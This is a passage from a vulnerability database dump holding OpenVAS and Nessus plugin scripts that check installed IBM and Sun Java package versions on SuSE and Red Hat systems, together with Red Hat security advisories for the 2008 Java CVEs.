"CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5354", "CVE-2008-5351"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n IBMJava5-JRE\n IBMJava5-SDK\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5041763 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065489", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065489", "type": "openvas", "title": "SLES9: Security update for IBM Java5 JRE and SDK", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5041763.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for IBM Java5 JRE and SDK\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n IBMJava5-JRE\n IBMJava5-SDK\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5041763 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65489\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2008-5350\", \"CVE-2008-5346\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5359\", \"CVE-2008-5341\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5348\", \"CVE-2008-2086\", \"CVE-2008-5345\", \"CVE-2008-5351\", \"CVE-2008-5360\", \"CVE-2008-5353\", \"CVE-2008-5356\", \"CVE-2008-5354\", \"CVE-2008-5357\", \"CVE-2008-5352\", \"CVE-2008-5342\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for IBM Java5 JRE and SDK\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"IBMJava5-JRE\", rpm:\"IBMJava5-JRE~1.5.0~0.57\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:46:34", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5351", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5358"], "description": "The IBM(r) 1.6.0 Java(TM) release includes the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2008-5340, CVE-2008-5341, CVE-2008-5342,\nCVE-2008-5343, CVE-2008-5351, CVE-2008-5356, CVE-2008-5357, CVE-2008-5358)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR4 Java release. 
All running instances\nof IBM Java must be restarted for the update to take effect.", "modified": "2017-09-08T12:20:12", "published": "2009-03-25T04:00:00", "id": "RHSA-2009:0369", "href": "https://access.redhat.com/errata/RHSA-2009:0369", "type": "redhat", "title": "(RHSA-2009:0369) Critical: java-1.6.0-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:32:08", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2086", "CVE-2008-5339", "CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5344", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5358", "CVE-2008-5359", "CVE-2008-5360"], "description": "The Java Runtime Environment (JRE) contains the software and tools that\nusers need to run applets and applications written using the Java\nprogramming language. \n\nA vulnerability was found in Java Web Start. If a user visits a\nmalicious website, an attacker could misuse this flaw to execute arbitrary\ncode. 
(CVE-2008-2086)\n\nAdditionally, these packages fix several other critical vulnerabilities.\nThese are summarized in the \"Advance notification of Security Updates for\nJava SE\" from Sun Microsystems.\n\nUsers of java-1.6.0-sun should upgrade to these updated packages, which\ncorrect these issues.", "modified": "2017-07-27T11:46:47", "published": "2008-12-04T05:00:00", "id": "RHSA-2008:1018", "href": "https://access.redhat.com/errata/RHSA-2008:1018", "type": "redhat", "title": "(RHSA-2008:1018) Critical: java-1.6.0-sun security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:31:31", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2086", "CVE-2008-5339", "CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5344", "CVE-2008-5345", "CVE-2008-5346", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5359", "CVE-2008-5360"], "description": "The IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment and\nthe IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These are\nsummarized in the \"Security Alerts\" from IBM. 
\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR9 Java release.", "modified": "2017-09-08T12:08:51", "published": "2009-01-13T05:00:00", "id": "RHSA-2009:0016", "href": "https://access.redhat.com/errata/RHSA-2009:0016", "type": "redhat", "title": "(RHSA-2009:0016) Critical: java-1.5.0-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:33:13", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2086", "CVE-2008-5339", "CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5344", "CVE-2008-5345", "CVE-2008-5346", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5359", "CVE-2008-5360"], "description": "The Java Runtime Environment (JRE) contains the software and tools that\nusers need to run applets and applications written using the Java\nprogramming language. \n\nA vulnerability was found in Java Web Start. If a user visits a\nmalicious website, an attacker could misuse this flaw to execute arbitrary\ncode. (CVE-2008-2086)\n\nAdditionally, these packages fix several other vulnerabilities. These are\nsummarized in the \"Advance notification of Security Updates for Java SE\"\nfrom Sun Microsystems. 
\n\nUsers of java-1.5.0-sun should upgrade to these updated packages, which\ncorrect these issues.", "modified": "2017-07-27T11:46:56", "published": "2008-12-04T05:00:00", "id": "RHSA-2008:1025", "href": "https://access.redhat.com/errata/RHSA-2008:1025", "type": "redhat", "title": "(RHSA-2008:1025) Critical: java-1.5.0-sun security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:09", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2086", "CVE-2008-5339", "CVE-2008-5340", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5344", "CVE-2008-5345", "CVE-2008-5346", "CVE-2008-5348", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5359", "CVE-2008-5360"], "description": "The IBM(r) 1.4.2 SR13 Java(TM) release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2008-2086, CVE-2008-5339, CVE-2008-5340,\nCVE-2008-5342, CVE-2008-5343, CVE-2008-5344, CVE-2008-5345, CVE-2008-5346,\nCVE-2008-5348, CVE-2008-5350, CVE-2008-5351, CVE-2008-5353, CVE-2008-5354,\nCVE-2008-5359, CVE-2008-5360)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13 Java release. 
All running\ninstances of IBM Java must be restarted for the update to take effect.", "modified": "2018-05-26T04:26:19", "published": "2009-04-23T04:00:00", "id": "RHSA-2009:0445", "href": "https://access.redhat.com/errata/RHSA-2009:0445", "type": "redhat", "title": "(RHSA-2009:0445) Critical: java-1.4.2-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:09", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3103", "CVE-2008-5345", "CVE-2008-5346", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5359", "CVE-2008-5360"], "description": "This update corrects several security vulnerabilities in the IBM Java 2\nRuntime Environment and the IBM Java 2 Software Development Kit, shipped as\npart of Red Hat Network Satellite Server. In a typical operating\nenvironment, these are of low security risk as the runtime is not used on\nuntrusted applets.\n\nSeveral vulnerabilities were discovered in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM \"Security alerts\" page listed in\nthe References section. (CVE-2008-3103, CVE-2008-5345, CVE-2008-5346,\nCVE-2008-5348, CVE-2008-5349, CVE-2008-5350, CVE-2008-5351, CVE-2008-5352,\nCVE-2008-5353, CVE-2008-5354, CVE-2008-5356, CVE-2008-5357, CVE-2008-5359,\nCVE-2008-5360)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR9 Java release. 
All running instances\nof IBM Java must be restarted for the update to take effect.", "modified": "2016-04-04T18:36:43", "published": "2009-05-07T04:00:00", "id": "RHSA-2009:0466", "href": "https://access.redhat.com/errata/RHSA-2009:0466", "type": "redhat", "title": "(RHSA-2009:0466) Low: java-1.5.0-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-17T13:06:34", "description": "Updated java-1.6.0-ibm packages that fix several security issues are\nnow available for Red Hat Enterprise Linux 4 Extras and Red Hat\nEnterprise Linux 5 Supplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe IBM(r) 1.6.0 Java(tm) release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM 'Security alerts' page\nlisted in the References section. (CVE-2008-5340, CVE-2008-5341,\nCVE-2008-5342, CVE-2008-5343, CVE-2008-5351, CVE-2008-5356,\nCVE-2008-5357, CVE-2008-5358)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR4 Java release. 
All running\ninstances of IBM Java must be restarted for the update to take effect.", "edition": 29, "published": "2009-08-24T00:00:00", "title": "RHEL 4 / 5 : java-1.6.0-ibm (RHSA-2009:0369)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5343", "CVE-2008-5357", "CVE-2008-5356", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5351"], "modified": "2009-08-24T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-src", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-devel", "cpe:/o:redhat:enterprise_linux:5.3", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-jdbc", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-plugin", "cpe:/o:redhat:enterprise_linux:4.7", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-demo", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-accessibility", "p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-javacomm"], "id": "REDHAT-RHSA-2009-0369.NASL", "href": "https://www.tenable.com/plugins/nessus/40739", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:0369. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40739);\n script_version(\"1.30\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5351\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\");\n script_bugtraq_id(32608, 32620, 32892);\n script_xref(name:\"RHSA\", value:\"2009:0369\");\n\n script_name(english:\"RHEL 4 / 5 : java-1.6.0-ibm (RHSA-2009:0369)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.6.0-ibm packages that fix several security issues are\nnow available for Red Hat Enterprise Linux 4 Extras and Red Hat\nEnterprise Linux 5 Supplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe IBM(r) 1.6.0 Java(tm) release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM 'Security alerts' page\nlisted in the References section. (CVE-2008-5340, CVE-2008-5341,\nCVE-2008-5342, CVE-2008-5343, CVE-2008-5351, CVE-2008-5356,\nCVE-2008-5357, CVE-2008-5358)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR4 Java release. 
All running\ninstances of IBM Java must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5340\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5341\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5356\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5357\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5358\"\n );\n # http://www.ibm.com/developerworks/java/jdk/alerts/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://developer.ibm.com/javasdk/support/security-vulnerabilities/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:0369\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(119, 189, 200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-accessibility\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-javacomm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-ibm-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/12/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:0369\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.6.0-ibm-1.6.0.4-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.6.0-ibm-demo-1.6.0.4-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.6.0-ibm-devel-1.6.0.4-1jpp.1.el4\")) 
flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.6.0-ibm-javacomm-1.6.0.4-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.6.0-ibm-javacomm-1.6.0.4-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.6.0-ibm-jdbc-1.6.0.4-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.6.0-ibm-plugin-1.6.0.4-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.6.0-ibm-src-1.6.0.4-1jpp.1.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.6.0-ibm-1.6.0.4-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-ibm-accessibility-1.6.0.4-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"java-1.6.0-ibm-accessibility-1.6.0.4-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-ibm-accessibility-1.6.0.4-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.6.0-ibm-demo-1.6.0.4-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.6.0-ibm-devel-1.6.0.4-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-ibm-javacomm-1.6.0.4-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-ibm-javacomm-1.6.0.4-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.6.0-ibm-jdbc-1.6.0.4-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-ibm-plugin-1.6.0.4-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.6.0-ibm-src-1.6.0.4-1jpp.1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-ibm / java-1.6.0-ibm-accessibility / java-1.6.0-ibm-demo / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:11:08", "description": "This update brings the IBM Java 6 JDK and JRE to Service Release 4. It\nfixes lots of bugs and various security issues :\n\n - A vulnerability in the Java Runtime Environment may\n allow an untrusted Java Web Start application to\n determine the location of the Java Web Start cache and\n the username of the user running the Java Web Start\n application. (CVE-2008-5341)\n\n - A vulnerability in the Java Runtime Environment with\n launching Java Web Start applications may allow an\n untrusted Java Web Start application to escalate\n privileges. For example, an untrusted application may\n grant itself permissions to read and write local files\n or execute local applications that are accessible to the\n user running the untrusted application. (CVE-2008-5340)\n\n - The UTF-8 (Unicode Transformation Format-8) decoder in\n the Java Runtime Environment (JRE) accepts encodings\n that are longer than the 'shortest' form. This behavior\n is not a vulnerability in Java SE. However, it may be\n leveraged to exploit systems running software that\n relies on the JRE UTF-8 decoder to reject non-shortest\n form sequences. For example, non-shortest form sequences\n may be decoded into illegal URIs, which may then allow\n files that are not otherwise accessible to be read, if\n the URIs are not checked following UTF-8 decoding.\n (CVE-2008-5351)\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. 
For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5356)\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5357)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing GIF images may allow an\n untrusted Java Web Start application to escalate\n privileges. For example, an untrusted application may\n grant itself permissions to read and write local files\n or execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5358)\n\n - A security vulnerability in the Java Web Start\n BasicService allows untrusted applications that are\n downloaded from another system to request local files to\n be displayed by the browser of the user running the\n untrusted application. 
(CVE-2008-5342)", "edition": 25, "published": "2009-09-24T00:00:00", "title": "SuSE 11 Security Update : IBM Java 1.6.0 (SAT Patch Number 736)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5357", "CVE-2008-5356", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5351"], "modified": "2009-09-24T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:java-1_6_0-ibm", "p-cpe:/a:novell:suse_linux:11:java-1_6_0-ibm-plugin", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:java-1_6_0-ibm-fonts", "p-cpe:/a:novell:suse_linux:11:java-1_6_0-ibm-jdbc", "p-cpe:/a:novell:suse_linux:11:java-1_6_0-ibm-alsa"], "id": "SUSE_11_JAVA-1_6_0-IBM-090405.NASL", "href": "https://www.tenable.com/plugins/nessus/41405", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41405);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5351\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\");\n\n script_name(english:\"SuSE 11 Security Update : IBM Java 1.6.0 (SAT Patch Number 736)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update brings the IBM Java 6 JDK and JRE to Service Release 4. 
